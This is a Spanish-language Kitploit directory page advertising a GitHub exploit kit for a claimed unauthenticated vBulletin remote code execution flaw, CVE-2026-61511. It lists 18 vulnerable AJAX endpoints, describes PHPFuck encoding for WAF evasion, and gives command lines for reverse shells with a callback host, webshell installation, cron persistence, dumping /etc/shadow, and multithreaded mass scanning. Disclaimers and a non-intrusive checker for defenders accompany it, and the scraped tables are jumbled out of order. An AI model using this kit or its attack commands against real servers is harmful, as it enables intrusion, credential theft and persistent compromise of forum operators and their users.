Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-61511-PoC-Exploit — CVE-2026-61511 – vBulletin RCE sin autenticación previa (CVSS 9.8). Vulnerabilidad en 5.x/6.x (sin parche). Multi-exploit mediante Endpoint Pool, AJAX, evasión de WAF con PHPFuck. Kit completo: reverse shell, proxy, persistencia, webshell, operaciones de base de datos, control de firewall, gestión de registros, escaneo masivo. 2 versiones: multi-exploit y verificación segura. Python 3.8+ Úsalo éticamente, mantente legal. 🔒 | Kitploit
Herramientas/GitHubGitHub/tc4dy/cve-2026-61511-poc-exploit
Mapeo de RedesAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPost-ExplotaciónEvasión de WAFPruebas de PenetraciónHerramienta de Acceso RemotoDesarrollo de Payloads

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Seguridad de Bases de Datos
GitHubtc4dy/cve-2026-61511-poc-exploit

CVE-2026-61511-PoC-Exploit

Ver Repositorio
410hace 1 mesAún no revisado

Acerca de

CVE-2026-61511 – vBulletin RCE sin autenticación previa (CVSS 9.8). Vulnerabilidad en 5.x/6.x (sin parche). Multi-exploit mediante Endpoint Pool, AJAX, evasión de WAF con PHPFuck. Kit completo: reverse shell, proxy, persistencia, webshell, operaciones de base de datos, control de firewall, gestión de registros, escaneo masivo. 2 versiones: multi-exploit y verificación segura. Python 3.8+ Úsalo éticamente, mantente legal. 🔒

Compartir

CVEPoC

CVE-2026-61511 – Exploit y Verificador de RCE Pre‑Auth en vBulletin

Python 3.8+ CVSS Author vBulletin

⚠️ SOLO USO ÉTICO – PRUEBAS DE SEGURIDAD AUTORIZADAS
Este repositorio proporciona herramientas solo para profesionales de seguridad autorizados, equipos azules y pentesters.
El acceso no autorizado a sistemas informáticos es ilegal según la CFAA (EE. UU.), la Computer Misuse Act (Reino Unido), el TCK 243/244 (Turquía) y leyes similares en todo el mundo.


📖 Resumen de la Vulnerabilidad

CVE‑2026‑61511 es una vulnerabilidad de inyección eval() en PHP en el motor de renderizado de plantillas AJAX de vBulletin.
Versiones afectadas: 5.0.0 – 5.7.5 y 6.0.0 – 6.2.1.

Cómo funciona

  1. Múltiples endpoints de ataque – el fallo existe en varios manejadores AJAX:

    • /ajax/render/pagenav
    • /ajax/api/ad/replaceAdTemplate
    • /ajax/render/widget_php
    • /ajax/render/widget_tabbedcontainer_tab_panel
    • Varios endpoints /ajax/api/content_* /getIndexableContent
  2. Codificación PHPFuck – la carga útil se transforma en una secuencia de operadores y números PHP que evita los filtros WAF y permite la ejecución de código PHP arbitrario.

  3. No se requiere autenticación – un atacante puede enviar una solicitud POST manipulada a cualquier endpoint vulnerable y ejecutar comandos del sistema con los privilegios del servidor web.

  4. Impacto – compromiso total del servidor, robo de datos, puertas traseras, movimiento lateral y persistencia. ¡Actualice la versión!

Parche

  • vBulletin 6.2.2 y el Patch Level 1 para versiones anteriores corrigen este problema.
  • Actualice siempre a la última versión.

🧰 Herramientas

HerramientaPropósitoUsuario previsto
exploit.pyKit completo con shell inversa, persistencia, operaciones de archivos, volcado de base de datos, gestión de firewall, gestión de registros, reenvío de puertos, despliegue de claves SSH, escaneo de red y escaneo masivo (multihilo).

📊 Comparación de Características


🎯 Resumen de Casos de Uso


⚙️ Instalación

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-61511-PoC-Exploit
cd CVE-2026-61511-PoC-Exploit
pip install -r requirements.txt

Contenido de requirements.txt:

root@kitploit:~
request
urllib3

Parámetros 🌬️

Escenarios

Pool de Endpoints 🅿️

🛡️ Uso Responsable

  • Utilice estas herramientas únicamente en sistemas que le pertenezcan o para los que tenga permiso escrito explícito de prueba.
  • El acceso no autorizado es ilegal y poco ético.
  • Los autores no son responsables de ningún uso indebido.
  • Siga siempre las leyes y regulaciones de su país.

Este software se proporciona solo con fines educativos y para pruebas de seguridad autorizadas.

Descargar herramienta
Equipos rojos / pentesters autorizados
safecheck.pyVerificador no intrusivo que comprueba la vulnerabilidad sin ejecutar ninguna carga útil maliciosa. Detecta la versión, prueba todos los endpoints y genera un informe detallado.Equipos azules / auditores de seguridad
Característicaexploit.pysafecheck.py
Detección de vulnerabilidad✅✅
Detección de versión✅✅
Pruebas multi‑endpoint (18 rutas)✅✅
Ejecución de comandos✅❌
Shell inversa✅❌
Subida/descarga de archivos✅❌
Mecanismos de persistencia✅❌
Despliegue de web shell✅❌
Operaciones de base de datos✅❌
Recopilación de información del sistema✅✅
Gestión de firewall✅❌
Gestión de registros✅❌
Reenvío de puertos✅❌
Despliegue de claves SSH✅❌
Escaneo de red✅❌
Escaneo masivo (multihilo)✅❌
Soporte de proxy✅✅
Salida de informe JSON✅✅
Menú interactivo✅❌
Modo no intrusivo (seguro)❌✅
Modo Verbose/Debug✅✅
Ejecución de comandos personalizados✅❌
Encadenamiento de múltiples comandos✅❌
Lectura remota de archivos✅❌
Escritura remota de archivos✅❌
Gestión de usuarios del sistema✅❌
Técnicas de evasión de firewall✅❌
Evasión de WAF (PHPFuck)✅✅
EscenarioHerramienta recomendada
Equipo azul – verificar si su instalación de vBulletin es vulnerablesafecheck.py
Auditoría de seguridad – evaluación de vulnerabilidad no intrusivasafecheck.py
Equipo rojo – pruebas de penetración autorizadas con explotación completaexploit.py
Bug Bounty – pruebas de divulgación responsablesafecheck.py
Escaneo masivo – comprobar múltiples objetivos en busca de vulnerabilidadesexploit.py (solo detección)
Respuesta a incidentes – comprobar si los sistemas están comprometidossafecheck.py
ParámetroDescripción
-t, --targetURL del objetivo (p. ej. http://forum.com/vb)
--proxyProxy HTTP (p. ej. http://127.0.0.1:8080)
--timeoutTiempo de espera de la solicitud en segundos (predeterminado: 10)
--retryNúmero de reintentos por ruta (predeterminado: 3)
--outputGuardar informe detallado en archivo JSON
-v, --verboseSalida detallada
-q, --quietModo silencioso (salida mínima)
--lhostRequerido para el exploit – IP para la devolución de llamada
--lportPuerto para la devolución de llamada (predeterminado: 4444)
--threadsHilos para escaneo masivo (predeterminado: 5)
--exploitRealizar explotación después de la detección
--fullAtaque completo (todos los módulos)
--shellIniciar shell inversa
--webshellInstalar web shell (/shell.php)
--persistInstalar persistencia (tarea cron)
--dumpVolcar base de datos
--dump-credsVolcar credenciales (/etc/passwd, /etc/shadow)
--interactiveMenú interactivo después de la verificación exitosa
#EscenarioComando
1Verificación rápida de vulnerabilidadpython safecheck.py -t http://target.com/vb
2Escaneo detallado con informepython safecheck.py -t http://target.com/vb --output report.json -v
3Shell inversapython exploit.py -t http://target.com/vb --lhost 192.168.1.100 --lport 4444 --shell
4Ataque completo (todos los módulos)python exploit.py -t http://target.com/vb --lhost 192.168.1.100 --full
5Escaneo masivo desde archivopython exploit.py -l targets.txt --lhost 192.168.1.100 --threads 20 --output results.json
6Modo de menú interactivopython exploit.py -t http://target.com/vb --lhost 192.168.1.100 --interactive
#Endpoint
1/ajax/render/pagenav
2/ajax/render/pagenav?template=page
3/ajax/api/ad/replaceAdTemplate
4/ajax/render/widget_php
5/ajax/render/widget_tabbedcontainer_tab_panel
6/ajax/api/content_infraction/getIndexableContent
7/ajax/api/content_video/getIndexableContent
8/ajax/api/content_text/getIndexableContent
9/ajax/api/content_report/getIndexableContent
10/ajax/api/content_redirect/getIndexableContent
11/ajax/api/content_privatemessage/getIndexableContent
12/ajax/api/content_poll/getIndexableContent
13/ajax/api/content_photo/getIndexableContent
14/ajax/api/content_link/getIndexableContent
15/ajax/api/content_gallery/getIndexableContent
16/ajax/api/content_event/getIndexableContent
17/ajax/api/content_channel/getIndexableContent
18/ajax/api/content_attach/getIndexableContent